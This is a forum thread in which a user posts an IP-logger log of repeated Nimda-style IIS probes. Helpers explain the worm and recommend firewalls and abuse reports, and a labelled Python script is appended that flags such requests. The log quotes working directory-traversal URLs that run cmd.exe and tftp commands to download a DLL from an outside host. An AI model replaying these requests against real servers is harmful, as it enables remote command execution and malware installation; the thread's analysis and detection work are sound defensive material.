I know someone is trying to install something on my computer. Can anyone tell me what this is? I was running some IP thing on my comp and this came up...very unexpectedly:
76 x Connection from 24.174.119.166
1 x IP Logged: 24.174.119.166- .exe?/c+dir
1 x IP Logged: 24.174.119.166- .exe?/c+tftp -i 24.174.119.166 GET cool.dll httpodbc.dll
1 x IP Logged: 24.174.119.166- odbc.dll
1 x IP Logged: 24.174.119.166- xe?/c+dir
1 x IP Logged: 24.174.119.166- xe?/c+tftp -i 24.174.119.166 GET cool.dll httpodbc.dll
1 x IP Logged: 24.174.119.166- bc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+dir
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
2 x IP Logged: 24.174.119.166- ll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../httpodbc.dll
sry if I wasn't supposed to include whoever was doing this's IP address but I don't give a damn
- Damian
Aim: Nizmo87

Hmmmm
Quite interesting indeed...
I looked around and saw several other logs like that....many seem to be associated with the Nimda worm.
It looks like someone's computer or a website you were on at the time is infected; if you are not up to date on antivirus software and Windows...possibly you picked up the infection as well. This site has a fair bit of info:
http://www.avp.ch/avpve/worms/email/nimda.stm
also here:
http://ls.berkeley.edu/mail/micronet/2001/0925.html
another log like yours:
http://archives.neohapsis.com/archives/incidents/2002-09/0090.html
If you don't have antivirus or it seems broken...try an online scan at Trend Micro's HouseCall.
You have a program running to log ip addresses....are you running a firewall?
ZoneAlarm and Sygate both offer a free version...quite effective. I think Kerio has one too. Hope that helps.
________________________________I never give up!

Thanks a lot..and no, I wasn't running a firewall. If I run an IP logger and don't run a firewall does that leave my computer open?
- Damian
Aim: Nizmo87

Um, I know this looks nasty to you, but anyone who operates a full-time network or web site sees this stuff all too often.
Best to note the IP and block it from further connections.
Then forget about it.
J.
j e r u v y a t y a h o o d o t c o m

Damian
An IP logger is just that...I don't know what IP logger you are running or if it comes with a firewall but if you don't have a firewall yes your computer is at risk. A firewall will block that kind of crap from coming in. You will see it in your firewall logs as blocked. If you spend a fair bit of time online or have a full time internet connection I highly recommend installing one.
You could do a whois on that ip which should give you their ISP...then report it to them with your log...they then can inform their customer they are infected.
I have seen quite a few people having their internet disconnected until the worm is removed.
Another option is a router; about 100 bucks CDN$. Works as a hardware firewall and harder to break.
________________________I never give up!
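
Added example (not part of the original thread or written by any of its posters): a small triage script that reads a log in the format posted above, decodes the percent-encoded requests, and totals the probe indicators per source IP, which is the kind of summary you would attach to an abuse report. The sample log, the tag names and the address 192.0.2.10 are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample in the thread's log format; 192.0.2.10 is a documentation address.
SAMPLE_LOG = r"""76 x Connection from 192.0.2.10
2 x IP Logged: 192.0.2.10- ..%255c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 192.0.2.10- ..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 192.0.2.10 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 192.0.2.10- ..%25%35%63../httpodbc.dll
3 x IP Logged: 192.0.2.10- index.html
"""

LINE = re.compile(r"^(\d+) x IP Logged: (\d+\.\d+\.\d+\.\d+)- (.*)$")
OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)  # overlong UTF-8 form of '/' or '\'
TFTP = re.compile(r"tftp\s+-i\s+\S+\s+GET\s+\S+", re.I)
TRAVERSAL = re.compile(r"\.\.[/\\]")

def fully_decode(text, max_rounds=4):
    # Percent-decode until nothing changes; the round count exposes double encoding.
    for rounds in range(max_rounds):
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:
            return text, rounds
        text = decoded
    return text, max_rounds

def classify(request):
    # Return the set of probe indicators present in one logged request.
    decoded, rounds = fully_decode(request)
    checks = {
        "traversal": TRAVERSAL.search(decoded),
        "double-encoded": rounds >= 2,
        "overlong-utf8": OVERLONG.search(request),
        "cmd.exe": "cmd.exe" in decoded.lower(),
        "tftp-fetch": TFTP.search(decoded.replace("+", " ")),
    }
    return {tag for tag, hit in checks.items() if hit}

def summarize(log):
    # Per source IP: number of flagged requests and a count per indicator.
    report = defaultdict(Counter)
    for line in log.splitlines():
        m = LINE.match(line.strip())
        tags = classify(m.group(3)) if m else set()  # non-request lines yield no tags
        if tags:
            count, ip = int(m.group(1)), m.group(2)
            report[ip]["flagged"] += count
            for tag in tags:
                report[ip][tag] += count
    return {ip: dict(c) for ip, c in report.items()}
```

Calling `summarize(SAMPLE_LOG)` returns one entry per source address; the ordinary `index.html` request is not counted.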
